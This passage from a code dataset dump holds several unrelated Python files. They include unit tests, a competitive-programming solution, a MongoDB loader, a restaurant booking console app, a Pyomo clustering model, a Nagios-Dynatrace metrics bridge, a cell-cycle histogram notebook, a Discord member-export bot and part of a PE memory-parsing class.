safe_get(vorgang.dict(), \"foo\")\n foo_bar_default = safe_get(vorgang.dict(), \"foo\", \"bar\", \"y\", \"x\", return_default=0)\n bar_bar = safe_get(vorgang.dict(), \"foo\", \"bar\")\n mietausgaben_betrag_monatlich = safe_get(vorgang.dict(), \"bonitaetsangaben\", \"mietausgaben\", \"betragMonatlich\")\n mietausgaben = safe_get(vorgang.dict(), \"bonitaetsangaben\", \"mietausgaben\")\n ehegattenunterhalt = safe_get(vorgang.dict(), \"bonitaetsangaben\", \"ehegattenunterhalt\", \"betragMonatlich\")\n bonitaetsangaben = safe_get(vorgang.dict(), \"bonitaetsangaben\")\n voranschrift_ort_as1 = safe_get(vorgang.dict(), \"stammdaten\", \"voranschriftOrtAs1\")\n sonstige_ausgaben = safe_get(vorgang.dict(), \"bonitaetsangaben\", \"sonstigeausgaben\")\n unterhaltsverpflichtungen_betrag_monatlich = safe_get(\n vorgang.dict(), \"bonitaetsangaben\", \"unterhaltsverpflichtungen\", \"betragMonatlich\")\n unterhaltsverpflichtungen_zugehoerigkeit = safe_get(\n vorgang.dict(), \"bonitaetsangaben\", \"unterhaltsverpflichtungen\", \"zugehoerigkeit\")\n kinder_kindergeld_fuer = safe_get(vorgang.dict(), \"stammdaten\", \"kinder\", \"kindergeldFuer\")\n partner = safe_get(vorgang.partner.dict(), \"custom\", \"value\")\n immobilien_darlehen_rate_monatlich = safe_get(vorgang.stammdaten.dict(), \"immobilien\", \"darlehen\", \"rateMonatlich\")\n\n # THEN\n assert_that(foo_bar, equal_to(None))\n assert_that(foo_bar_default, equal_to(0))\n assert_that(bar_bar, equal_to(None))\n assert_that(mietausgaben_betrag_monatlich, equal_to(\"1\"))\n assert_that(mietausgaben, instance_of(dict))\n assert_that(mietausgaben is None, equal_to(False))\n assert_that(mietausgaben[\"betragMonatlich\"], equal_to(\"1\"))\n assert_that(mietausgaben[\"zugehoerigkeit\"], equal_to(\"as1\"))\n assert_that(bonitaetsangaben, instance_of(dict))\n assert_that(bonitaetsangaben[\"mietausgaben\"][0][\"betragMonatlich\"], equal_to(\"1\"))\n assert_that(bonitaetsangaben[\"mietausgaben\"][0][\"zugehoerigkeit\"], equal_to(\"as1\"))\n assert_that(bonitaetsangaben is None, equal_to(False))\n assert_that(voranschrift_ort_as1, equal_to(\"Berlin\"))\n assert_that(sonstige_ausgaben, equal_to(None))\n assert_that(unterhaltsverpflichtungen_betrag_monatlich, equal_to(None))\n assert_that(unterhaltsverpflichtungen_zugehoerigkeit, equal_to(\"as1\"))\n assert_that(kinder_kindergeld_fuer, equal_to(\"lisa\"))\n assert_that(partner, equal_to(\"AMA\"))\n assert_that(ehegattenunterhalt, equal_to(None))\n assert_that(immobilien_darlehen_rate_monatlich, equal_to(100))\n","repo_name":"Vulonus/WetterApi","sub_path":"tests/unit/common/util_test.py","file_name":"util_test.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42971476529","text":"def make_divistors(n):\n lower, upper = [], []\n i = 1\n while i * i <= n:\n if n % i == 0:\n lower.append(i)\n upper.append(n // i)\n i += 1\n return lower, upper\n\nN = int(input())\nA = list(map(int, input().split()))\nA.sort()\nans = 0\ndict = {}\nfor i in range(N):\n if A[i] not in dict:\n dict[A[i]] = 1\n else:\n dict[A[i]] += 1\n\n\nfor i in range(N):\n res1, res2 = make_divistors(A[i])\n for j in range(len(res1)):\n if res1[j] in dict and res2[j] in dict:\n if res1[j] != res2[j]:\n ans += dict[res1[j]] * (dict[res2[j]]) * 2\n else:\n ans += dict[res1[j]] * dict[res1[j]]\nprint(ans)","repo_name":"Okabe-Junya/AtCoderArchive","sub_path":"ABC/201-250/249/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32950123566","text":"import csv\n\nfrom pymongo import MongoClient\nfrom .mongo_queries import run_queries\nfrom ..config import data_path\nfrom csv import DictReader\nfrom ..utils import to_dict\n\nDATABASE=\"progettodb2\"\n\ndef connect(ip: str = \"localhost\", port: int = 27017) -> MongoClient:\n connection = \"mongodb://\" + ip + \":\" + str(port) + \"/\" + DATABASE\n return MongoClient(connection)\n\ndef reset(handle: MongoClient):\n handle.drop_database(DATABASE)\n\ndef load_data(handle: MongoClient):\n db = handle.progettodb2\n\n with open(data_path('cells.csv'), \"r\") as cfile:\n db.cells.insert_many(to_dict(list(DictReader(cfile))))\n\n cfile.close()\n\n with open(data_path('people.csv'), \"r\") as pfile:\n db.people.create_index(\"number\", unique=True)\n db.people.insert_many(to_dict(list(DictReader(pfile))))\n\n pfile.close()\n\n with open(data_path('calls.csv'), \"r\") as cafile:\n db.calls.insert_many(to_dict(list(DictReader(cafile))))\n\n cafile.close()\n\n print(\"[Info - MONGO]: database caricato\")\n\ndef exec(load: int, refresh: bool):\n handle = connect()\n\n if refresh:\n reset(handle)\n load_data(handle)\n\n\n run_queries(handle, load)\n\n\n\n\n","repo_name":"aloxyz/db-unime","sub_path":"src/mongo/mongo_manager.py","file_name":"mongo_manager.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17510276829","text":"from Class import *\r\nfrom Function import *\r\n \r\n# def toWaitingList(booking): # booking: Booking\r\n\r\n# def showWaitingList():\r\n\r\n\r\n# initialize restaurant info\r\nset_seats = 5\r\nr_objs = [Restaurant() for i in range(5)] # create Restaurant object list\r\nrestList = [\"A\", \"B\", \"C\", \"D\", \"E\"]\r\nday_List = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\"]\r\ntime_List = [\"9\", \"10\", \"11\", \"12\"]\r\nitem = 0\r\nfor r in r_objs:\r\n r.restName = restList[item]\r\n r.book = {}\r\n for i in day_List:\r\n for j in time_List:\r\n r.book[(i, j)] = set_seats\r\n item += 1\r\n# print(r.book)\r\n\r\nb_objs = [] # create Booking object list\r\nb_name = []\r\ntop_k = 3\r\n\r\n##### input some booking info by text document\r\ninput_path = \"input_1.txt\"\r\nwith open(input_path, 'r', newline='') as file_in:\r\n f = file_in.read().splitlines()\r\n for lines in f:\r\n value_list = lines.split(' ')\r\n b = Booking()\r\n b_objs.append(b) # record booking info\r\n # input booking information\r\n b.name = value_list[0]\r\n b_name.append(b.name)\r\n b.day = value_list[1]\r\n b.time = value_list[2]\r\n b.restName = value_list[3]\r\n b.num = int(value_list[4])\r\n\r\n for r in r_objs:\r\n if r.restName == b.restName:\r\n if r.book[(b.day, b.time)] - b.num >= 0:\r\n r.book[(b.day, b.time)] -= b.num\r\n break\r\n\r\n##### input some review info by text document\r\ninput_path = \"input_2.txt\"\r\nwith open(input_path, 'r', newline='') as file_in:\r\n f = file_in.read().splitlines()\r\n for lines in f:\r\n value_list = lines.split(' ')\r\n name = value_list[0]\r\n restName = value_list[1]\r\n review = int(value_list[2])\r\n \r\n # recalculate the review point of the restaurant and top-k rank of restaurant recommendation\r\n reviewRank = recalculate(restName, review, top_k, r_objs)\r\n # print(reviewRank.array)\r\n\r\n\r\n##### input booking info by user interface\r\nwhile True:\r\n print(\"What do you want to do?\")\r\n print(\"1. Book seat\")\r\n print(\"2. Cancel booking\")\r\n print(\"3. Modify booking\")\r\n print(\"4. Check status\")\r\n print(\"5. Leave comment\")\r\n \r\n user_input = input()\r\n \r\n ### Case 1:\r\n if user_input == \"1\":\r\n b = Booking()\r\n b_objs.append(b) # record booking info\r\n \r\n # input booking information\r\n b.name = input(\"Your_name:\")\r\n b_name.append(b.name)\r\n b.day = input(\"Day(Monday-Friday):\")\r\n while b.day not in day_List:\r\n print(\"Spelling error!\")\r\n b.day = input(\"Day(Monday-Friday):\")\r\n b.time = input(\"Time(9-12):\")\r\n while b.time not in time_List:\r\n print(\"Input error!\")\r\n b.time = input(\"Time(9-12):\")\r\n # list the remain seats info of restaurant\r\n for r in r_objs:\r\n r.capacity = str(r.book[(b.day, b.time)]) + \"/\" + str(set_seats)\r\n print(r.restName, \": \", r.capacity)\r\n # list the top-k recommendation according to the reviews\r\n reviewRank.array.sort()\r\n print(\"Top_\", str(top_k), \" Recommendation:\", sep = \"\")\r\n for i in reviewRank.array:\r\n print(i[1], \": \", -i[0])\r\n \r\n b.restName = input(\"Restaurant_name:\")\r\n while b.restName not in restList:\r\n print(\"Can't find!\")\r\n b.restName = input(\"Restaurant_name:\")\r\n b.num = int(input(\"Number of people:\"))\r\n\r\n # seat booking function\r\n seatBooking(b, r_objs, b_objs, b_name)\r\n \r\n ### Case 2 & Case 3:\r\n elif user_input == \"2\" or user_input == \"3\":\r\n name = input(\"Your_name:\")\r\n if name not in b_name:\r\n print(\"No booking history!\")\r\n continue\r\n\r\n # list history booking\r\n historyBooking(name, b_objs)\r\n\r\n # choose the history record to cancel or modify\r\n day = input(\"Day(Monday-Friday):\")\r\n while day not in day_List:\r\n print(\"Spelling error!\")\r\n day = input(\"Day(Monday-Friday):\") \r\n time = input(\"Time(9-12):\")\r\n while time not in time_List:\r\n print(\"Input error!\")\r\n time = input(\"Time(9-12):\")\r\n \r\n if user_input == \"2\":\r\n # cancel booking function\r\n cancelBooking(name, day, time, r_objs, b_objs, b_name)\r\n \r\n if user_input == \"3\":\r\n # modify booking function\r\n modifyBooking(name, day, time, r_objs, b_objs)\r\n\r\n ### Case 4:\r\n elif user_input == \"4\":\r\n name = input(\"Your_name:\")\r\n if name not in b_name:\r\n print(\"No booking history!\")\r\n continue\r\n\r\n # list history booking function\r\n historyBooking(name, b_objs)\r\n\r\n ### Case 5:\r\n elif user_input == \"5\":\r\n name = input(\"Your_name:\")\r\n print(\"The restaurant name you want to leave comment:\")\r\n for r in restList:\r\n # can use a drop-down list\r\n print(r)\r\n restName = input()\r\n review = int(input(\"Your point of review(1-5):\"))\r\n \r\n # recalculate the review point of the restaurant and top-k rank of restaurant recommendation\r\n reviewRank = recalculate(restName, review, top_k)\r\n\r\n ### Not sure whether can I modify class or global variable inside a non-class function without passing it as a parameter ???\r\n\r\n # print(reviewRank.array)\r\n \r\n else: \r\n continue\r\n\r\n user_input = input(\"Continue y/n?\")\r\n if user_input == \"n\":\r\n break\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Perry851211/DS_Final_Project","sub_path":"Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74584028034","text":"from pyomo import environ as pe\n\ndef create_model():\n \n m = pe.AbstractModel()\n \n m.n_days = pe.Param(\n within=pe.PositiveIntegers,\n doc='''Number of days.'''\n )\n \n m.n_clusters = pe.Param(\n within=pe.PositiveIntegers,\n doc='''Number of clusters.'''\n )\n \n m.n_extreme_days = pe.Param(\n within=pe.NonNegativeIntegers,\n initialize=0,\n doc='''Number of extreme days.'''\n )\n \n #====================================#\n # Sets\n #====================================#\n \n m.Days = pe.RangeSet(m.n_days)\n \n m.Days_cross = pe.Set(\n initialize=m.Days*m.Days,\n doc=''''''\n )\n \n m.Clusters = pe.RangeSet(m.n_clusters)\n \n #====================================#\n # Parameters\n #====================================#\n \n m.distance = pe.Param(m.Days_cross)\n \n #====================================#\n # Variables\n #====================================#\n \n m.z = pe.Var(\n m.Days_cross, \n within = pe.Binary,\n initialize=0,\n doc = '''1 iff object j is assigned to the cluster \n whose representative element is object i.'''\n )\n \n m.y = pe.Var(\n m.Days, \n within = pe.Binary,\n initialize=0,\n doc = '''1 iff object i is chosen as representative \n of its cluster.'''\n )\n \n #====================================#\n # Constraints\n #====================================#\n \n def _total_representative_days(m):\n return sum(m.y[i] for i in m.Days) == m.n_clusters\n \n m.total_representative_days = pe.Constraint(\n rule = _total_representative_days,\n doc = '''One representative day for each cluster.'''\n )\n \n def _each_non_extreme_day_is_represented(m, j):\n return sum(m.z[i,j] for i in m.Days) <= 1\n \n m.each_non_extreme_day_is_represented = pe.Constraint(\n m.Days,\n rule = _each_non_extreme_day_is_represented,\n doc='''each day is represented by exactly 1 day \n (without EDs)'''\n )\n \n def _total_represented_days(m):\n return sum(m.z[ij] for ij in m.Days_cross) == m.n_days - m.n_extreme_days\n \n m.total_represented_days = pe.Constraint(\n rule = _total_represented_days,\n doc = '''All non-extreme days are represented.'''\n )\n \n def _represented_by_representative(m, i, j):\n return m.z[i,j] <= m.y[i]\n \n m.represented_by_representative = pe.Constraint(\n m.Days_cross,\n rule = _represented_by_representative,\n doc = '''Days can only be represented by \n representative days.'''\n )\n \n #====================================#\n # Objective Function\n #====================================#\n \n def _total_distance(m):\n return sum(m.distance[ij]*m.z[ij] for ij in m.Days_cross)\n \n \n m.minimize_total_distance = pe.Objective(\n rule=_total_distance,\n doc='''Mininimize total distance between days \n of the same cluster.''' \n )\n \n return m\n \n \n \n \n ","repo_name":"GiorgioBalestrieri/typical_days_milp_clustering","sub_path":"k_medoids_milp.py","file_name":"k_medoids_milp.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12903407109","text":"#!/usr/bin/env python\r\n\"\"\"\r\nIntegracion Nagios-Dynatrace:\r\nConsulta los datos de hosts de Nagios a traves de MK-Livestatus y envia las metricas a Dynatrace creando el CUSTOM DEVICE\r\nen caso de no existir\r\n\r\nDynatrace Type Events:\r\n AVAILABILITY_EVENT\r\n CUSTOM_ALERT\r\n CUSTOM_ANNOTATION\r\n CUSTOM_CONFIGURATION\r\n CUSTOM_DEPLOYMENT\r\n CUSTOM_INFO\r\n ERROR_EVENT\r\n MARKED_FOR_TERMINATION\r\n PERFORMANCE_EVENT\r\n RESOURCE_CONTENTION_EVENT\r\n\"\"\"\r\n\r\nimport time\r\nimport sched\r\nimport json\r\nimport App.DynatraceApp as Dyna\r\nimport App.NagiosApp as Nagios\r\nimport App.IntegrationErrors as IntegrationErrors\r\n\r\nwith open('/etc/dynatrace-integrations/config.json', 'r') as file: config = json.load(file)\r\n\r\nHOST_WHITELIST = config[\"NAGIOS\"][\"HOST_WHITELIST\"]\r\nSERVICE_WHITELIST = config[\"NAGIOS\"][\"SERVICE_WHITELIST\"]\r\n\r\nclass Integracion(object):\r\n def __init__(self):\r\n self.NagiosConn = Nagios.Connection(config[\"NAGIOS\"][\"NAGIOS_SOCKET\"])\r\n self.DynaConn = Dyna.Connection(config[\"DYNATRACE\"][\"API_URL\"], config[\"DYNATRACE\"][\"API_TOKEN\"])\r\n\r\n def CargarHosts(self):\r\n '''Obtiene el listado de hosts a monitorear'''\r\n favicon = \"http://assets.dynatrace.com/global/icons/infographic_rack.png\"\r\n tmpHosts = self.NagiosConn.getHosts()\r\n \r\n for host in tmpHosts:\r\n if (HOST_WHITELIST and host[\"name\"] in HOST_WHITELIST) or not HOST_WHITELIST:\r\n #TODO: Configurar puertos del host\r\n dHost = self.DynaConn.addCustomHost(host['name'], host['address'], ['80','8080','443','8428','9100','9104','53862','53852'], 'Nagios', favicon, '', host['groups'][0])\r\n dHost.addTag(host['groups'])\r\n\r\n def CargarMetricas(self):\r\n '''Consulta los servicios de Nagios y asigna cada una de las metricas a los CustomHosts'''\r\n\r\n for host in self.DynaConn.getHosts():\r\n lstServices = []\r\n lstTmpServices = self.NagiosConn.getMetricas(host.displayName)\r\n for nagServ in lstTmpServices:\r\n if (SERVICE_WHITELIST and nagServ[\"service_description\"] in SERVICE_WHITELIST) or not SERVICE_WHITELIST:\r\n lstServices.append(nagServ)\r\n \r\n host.clearSeries()\r\n for service in lstServices:\r\n \r\n stateError = True\r\n if (service[\"state\"] == 0): stateError = False\r\n\r\n self.DynaConn.checkIsEvent(host.displayName, service[\"description\"], stateError)\r\n\r\n lstMetricas = self.NagiosConn.parsePerfData(service[\"perf_data\"])\r\n \r\n for metrica in lstMetricas:\r\n host.addSerie(service[\"description\"], metrica, lstMetricas[metrica][0])\r\n \r\n def EnviarMetricas(self):\r\n '''Eviar los datos a Dynatrace'''\r\n self.DynaConn.sendMetrics()\r\n\r\n def EnviarEventos(self):\r\n '''Eviar los eventos a Dynatrace'''\r\n self.DynaConn.sendEvents()\r\n\r\n#####MAIN###############################################################################################################\r\noInteg = Integracion()\r\ns = sched.scheduler(time.time, time.sleep)\r\n\r\ndef programa(start, end, interval, func, args=()):\r\n event_time = start\r\n while event_time < end:\r\n s.enterabs(event_time, 0, func, args)\r\n event_time += interval\r\n\r\n s.run()\r\n\r\ndef service_integration():\r\n oInteg.CargarMetricas()\r\n oInteg.EnviarMetricas()\r\n oInteg.EnviarEventos()\r\n\r\ndef main():\r\n try:\r\n oInteg.CargarHosts()\r\n\r\n print(\"Inicio - Recoleccion de Metricas de Nagios\")\r\n\r\n #Ajustar los tiempos (+100000 1 dia)\r\n programa(time.time()+5, time.time()+100000, 90, service_integration)\r\n\r\n except IntegrationErrors.NagiosToDynaError as err:\r\n print(err)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"martiroman/webhooks-integrations","sub_path":"dynatrace-nagios-integration.py","file_name":"dynatrace-nagios-integration.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27657954886","text":"\n# coding: utf-8\n\n# In[291]:\n\n\nget_ipython().run_line_magic('matplotlib', 'notebook')\n\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy\nfrom scipy.signal import savgol_filter\nfrom scipy.signal import find_peaks\nfrom scipy.signal import boxcar\nimport glob\nfrom pathlib import Path\nimport re\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport csv\nimport seaborn as sns\nimport itertools\nfrom ipywidgets import interact, interactive, fixed, interact_manual\nimport ipywidgets as widgets\n\nsns.set(font_scale=1)\nsns.set_style(\"white\")\nsns.set_palette('gray')\nsns.set_context(\"paper\")\n\nidx=pd.IndexSlice\n\n\n# In[135]:\n\n\n#Imports all histograms with filenames as headers\n\n\n\npath = \"C:/Users/gadzo/OneDrive/Documents/Master Research/Cell Cycle Analysis/Hist_GNP_DTX_Cycle/\"\n\nall_files = Path(path)\n\nfor p in all_files.glob('*.txt'):\n print(p)\n p.rename(p.with_suffix('.csv'))\n \n\ndf = pd.concat(map(lambda file: pd.read_csv(file, sep='\\s+').drop(columns=['FL2-A', 'Fluorescence']), all_files.glob('*.csv')), axis=1)\n\n\nindex = [x.stem for x in all_files.glob('*.csv')]\ndf.columns = index\n\n\n# In[136]:\n\n\n##Change the index parameters to fit your labeling scheme\n\nnewIndex = pd.DataFrame(columns=['Cell', 'Endo/Exo', 'Cond', 'Time'])\n\n\nfor ind, c in enumerate(index):\n newIndex.loc[ind, 'Cell'] = c[0] \n newIndex.loc[ind, 'Endo/Exo'] = c[1]\n \n cSplit = re.split('(\\d+)', c[2:])\n newIndex.loc[ind, 'Cond'] = cSplit[0]+cSplit[2]\n newIndex.loc[ind, 'Time'] = int(cSplit[1])\n\nnewIndex.set_index(['Cell', 'Endo/Exo', 'Cond', 'Time'], inplace=True)\nprint(newIndex)\n\ndf.columns = newIndex.index\ndf.columns.sortlevel(sort_remaining=True)\ndf\n\n\n# In[180]:\n\n\ns = slice(0,1024)\n\nplt.figure()\nplt.plot(df.loc[s, idx['H', 'N':'X', 'D', :]])\nplt.show()\n\n\n# In[5]:\n\n\nhist['Events'].nonzero()[0][-1]\n\n\n# In[259]:\n\n\ndef filterDat(data, num=11):\n ones = boxcar(num)/num\n result = np.convolve(data, ones, mode='same')\n \n return result\n\n\n# In[366]:\n\n\ndef shift(data):\n data = savgol_filter(data.values, 31, 3)\n old_x = np.linspace(0,1023,1024)\n \n # Stretch\n secondIndex =200\n indexes, prop = find_peaks(data, height=5, distance=120)\n print(indexes)\n print(prop)\n \n if indexes.size==2:\n width = 200/(indexes[1]-indexes[0])\n print(width)\n new_x = np.arange(200-(indexes[0]*width), (1024*width+(200-(indexes[0]*width))), width)\n \n if new_x.size>1024:\n new_x = new_x[0:1024]\n new_data = np.interp(old_x, new_x, data)\n \n return new_data/(data.sum()*width)\n \n elif indexes.size==1:\n new_x = old_x*400/indexes[0]\n new_data = np.interp(old_x, new_x, data)\n return new_data/(data.sum()*(400/indexes[0]))\n \n \n return new_data/(data.sum()*width)\n else:\n return data/data.sum()\n \"\"\"\n difference = secondIndex-secondMaxIndex\n ratio = secondIndex/(secondMaxIndex)\n old_x = np.linspace(0, int(len(data))-1, int(len(data)))\n new_x = np.linspace(0, int(len(data))-1, int(len(data)*ratio))\n\"\"\"\n \n\n\n# In[370]:\n\n\n#df_filt = df.apply(filterDat)\ndf_sav = df.apply(shift)\n\n\n# In[367]:\n\n\nshift(df.loc[s, idx['H', 'X', 'D', 24]])\n\n\n# In[368]:\n\n\nplt.figure()\n#plt.plot(df.loc[s, idx['H', 'X', 'D', 24]])\nplt.plot(shift(df.loc[s, idx['H', 'X', 'D', 24]]))\nplt.show()\n\n\n# In[352]:\n\n\ns = slice(0,1024)\n\n\nfig, axes = plt.subplots(figsize=(8, 6))\n\nplt.plot(df_sav.loc[s, idx['M', :, ('C','D'), :]])\n\n\naxes.legend()\n\naxes.set_ylabel('% of Total')\naxes.set_xlabel(\"DNA content (Arbitrary Units)\")\naxes.set_xlim(100, 550)\naxes.xaxis.set_major_locator(plt.NullLocator())\naxes.xaxis.set_major_formatter(plt.NullFormatter())\n#axes.set_ylim(0, 100)\naxes.set_title(\"MDA-MB-231 Cell Cycle, 50nM Docetaxel\")\nplt.show()\nplt.savefig('MDA_Cell_Cycle', bbox_inches='tight')\n\n\n# In[374]:\n\n\nfig, axes = plt.subplots(1, 4, figsize=(8, 2.5), sharey=True)\nfig.suptitle('MDA-MB-231')\naxes[0].plot(df_sav.loc[s, idx['M', 'N', 'C', 24]])\naxes[0].set_title('Control')\naxes[1].plot(df_sav.loc[s, idx['M', 'N', 'D', 8]])\naxes[1].set_title('8h')\naxes[2].plot(df_sav.loc[s, idx['M', 'N', 'D', 24]])\naxes[2].set_title('24h')\naxes[3].plot(df_sav.loc[s, idx['M', 'X', 'D', 24]])\naxes[3].set_title('Exo 24h')\n#fig.subplots_adjust(hspace=0)\nfor ax in axes:\n ax.set_xlim(50, 550)\n ax.xaxis.set_major_locator(plt.NullLocator())\n ax.xaxis.set_major_formatter(plt.NullFormatter())\n ax.set_ylim(0, .025)\n ax.label_outer()\n \naxes[0].set_ylabel('% of Total')\naxes[1].set_xlabel(\"DNA content\")\naxes[2].set_xlabel(\"(Arbitrary Units)\")\nplt.show()\nplt.savefig('MDA_Cell_Cycle.png', bbox_inches='tight', dpi=300, format='png')\n\n\n# In[152]:\n\n\ny[137]\n\n","repo_name":"0xKyleCode/DBCCode","sub_path":"Cell_Cycle_Histogram.py","file_name":"Cell_Cycle_Histogram.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35417041991","text":"# NOTE: Make sure your APP/BOT has the guild_members intent enabled in the developer portal\n\nto_download = [285898487554375681, 642867988940324879]\n\nbot_token = \"TOKEN\"\n\n# Everything below this line can be ignored\n\nimport naff\nimport pandas as pd\n\nintents = naff.Intents.new(\n guild_members=True,\n guilds=True,\n)\n\nbot = naff.Client(\n intents=intents,\n sync_interactions=True,\n basic_logging=True,\n)\n\n\n@naff.listen(naff.events.Startup, delay_until_ready=True)\nasync def download_members():\n print(\"Ready!\")\n for guild_id in to_download:\n guild = bot.get_guild(guild_id)\n # save the members into a csv with the guild_id,member_id,tag\n print(f\"Downloading {guild.name}...\")\n # chunk all the members\n # it takes ten seconds for each 1000 members\n print(\n f\"Chunking... {guild.member_count} members. ETA: {guild.member_count / 1000 * 10} seconds\"\n )\n await guild.chunk()\n print(\"Done chunking!\")\n print(f\"Saving {guild.name}...\")\n # use pandas to save the members\n df = pd.DataFrame(\n [\n {\n \"guild_id\": guild_id,\n \"member_id\": member.id,\n \"tag\": member.tag,\n }\n for member in guild.members\n ]\n )\n df.to_csv(f\"{guild_id}.csv\", index=False)\n print(\"Done saving!\")\n\n print(f\"Done with {guild_id}\")\n\n print(\"Done downloading all members!\")\n print(\"Go to compare.py and put in the 2 file names.\")\n await bot.stop()\n\n\nbot.start(bot_token)\n","repo_name":"Wolfhound905/member-compare-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"40186285561","text":"from .exceptions import NotificationError\nfrom .utils import log, request\n\n\nclass BaseNotifier(object):\n def __init__(self):\n self.name = None\n self.token = None\n self.retcode_key = None\n self.retcode_value = None\n\n def send(self, text, status, desp):\n ...\n\n def push(\n self, method, url, params=None, data=None, json=None, headers=None, proxies=None\n ):\n \"\"\"\n 🚫: disabled\n 🥳: success\n 😳: failure\n \"\"\"\n if not self.token:\n # log.info(f'{self.name} 🚫')\n return\n try:\n response = request(\n method, url, 2, params, data, json, headers, proxies=proxies\n )\n except Exception as e:\n log.error(f'{self.name} 😳\\n{e}')\n raise NotificationError()\n else:\n if self.name == 'Server Chan Turbo':\n retcode = response.json().get('data', {}).get(self.retcode_key, -1)\n elif self.name == 'Discord' or self.name == 'gotify':\n retcode = response.status_code\n else:\n retcode = response.json().get(self.retcode_key, -1)\n if retcode == self.retcode_value:\n log.info(f'{self.name} 🥳')\n\n # Telegram Bot\n elif self.name == 'Telegram Bot' and retcode:\n log.info(f'{self.name} 🥳')\n elif (\n self.name == 'Telegram Bot'\n and response.json()[self.retcode_value] == 400\n ):\n log.error(f'{self.name} 😳\\n请主动给 bot 发送一条消息并检查 TG_USER_ID 是否正确')\n log.error(response.json())\n raise NotificationError()\n elif (\n self.name == 'Telegram Bot'\n and response.json()[self.retcode_value] == 401\n ):\n log.error(f'{self.name} 😳\\nTG_BOT_TOKEN 错误')\n log.error(response.json())\n raise NotificationError()\n # Chanify\n elif self.name == 'Chanify' and response.json().get('request-uid'):\n log.info(f'{self.name} 🥳')\n\n else:\n log.error(f'{self.name} 😳\\n{response}')\n log.error(response.json())\n raise NotificationError()\n # 一个推送渠道失败后不会继续进行推送\n finally:\n return\n","repo_name":"Xm798/Genshin-Dailynote-Reminder","sub_path":"dailynotereminder/notifiers/basenotifier.py","file_name":"basenotifier.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
+{"seq_id":"809667315","text":"import os\nimport unittest\nfrom io import StringIO\nfrom unittest.mock import patch\n\nimport sumologic_opentelemetry.env\n\n\ndef capture_stdout(function, *args, **kwargs):\n @patch(\"sys.stdout\", new_callable=StringIO)\n def invoke(mock_stdout):\n ret = function(*args, **kwargs)\n stdout = mock_stdout.getvalue()\n return ret, stdout\n\n return invoke()\n\n\nclass EnvTestCase(unittest.TestCase):\n def assert_env_vars_in_stdout(self, stdout, expected):\n for key, value in expected:\n self.assertRegex(\n stdout,\n r\"{key}\\w*=\\w*{value}\\w*\".format(key=key, value=value),\n f\"{key}={value} not found in stdout\",\n )\n\n def test_dump_prints_defaults(self):\n expected_env_values = [\n (\"OTEL_PROPAGATORS\", \"tracecontext,baggage,b3,b3multi,jaeger,xray,ottrace\"),\n (\"OTEL_TRACES_EXPORTER\", \"otlp_proto_http\"),\n ]\n sumologic_opentelemetry.env.generate()\n _, stdout = capture_stdout(sumologic_opentelemetry.env.dump)\n self.assert_env_vars_in_stdout(stdout, expected_env_values)\n\n def test_dump_prints_non_defaults(self):\n expected_env_values = [(\"OTEL_LOG_LEVEL\", \"info\")]\n os.environ[\"OTEL_LOG_LEVEL\"] = \"info\"\n _, stdout = capture_stdout(sumologic_opentelemetry.env.dump)\n self.assert_env_vars_in_stdout(stdout, expected_env_values)\n\n def test_generate_defaults(self):\n sumologic_opentelemetry.env.generate()\n self.assertIn(\"OTEL_PROPAGATORS\", os.environ)\n self.assertIn(\"OTEL_TRACES_EXPORTER\", os.environ)\n\n def test_generate_skips_existing(self):\n os.environ[\"OTEL_PROPAGATORS\"] = \"non-default-value\"\n sumologic_opentelemetry.env.generate()\n self.assertEqual(os.environ[\"OTEL_PROPAGATORS\"], \"non-default-value\")\n","repo_name":"SumoLogic/sumologic-opentelemetry-python","sub_path":"test/env_test.py","file_name":"env_test.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"32196684159","text":"from typing import List, Optional\r\n\r\nfrom ..dnpe import DnPE\r\nfrom .binmem import ProcessMemoryBuffer\r\nfrom .procmempe import ProcessMemoryPE\r\nfrom .region import Region\r\n\r\n__all__ = [\"ProcessMemoryDnPE\", \"procmemdnpe\"]\r\n\r\n\r\nclass ProcessMemoryDnPE(ProcessMemoryPE):\r\n\r\n __magic__ = b\"MZ\"\r\n\r\n def __init__(\r\n self,\r\n buf: ProcessMemoryBuffer,\r\n base: int = 0,\r\n regions: Optional[List[Region]] = None,\r\n image: bool = False,\r\n detect_image: bool = False,\r\n ) -> None:\r\n self._pe: Optional[DnPE] = None\r\n super(ProcessMemoryPE, self).__init__(\r\n buf, base=base, regions=regions, image=image, detect_image=detect_image\r\n )\r\n\r\n def _pe_direct_load(self, fast_load: bool = True) -> DnPE:\r\n offset = self.v2p(self.imgbase)\r\n if offset is None:\r\n raise ValueError(\"imgbase out of regions\")\r\n # Expected m type: bytearray\r\n m = bytearray(self.readp(offset))\r\n pe = DnPE(data=m, fast_load=fast_load)\r\n return pe\r\n\r\n def is_valid(self) -> bool:\r\n if 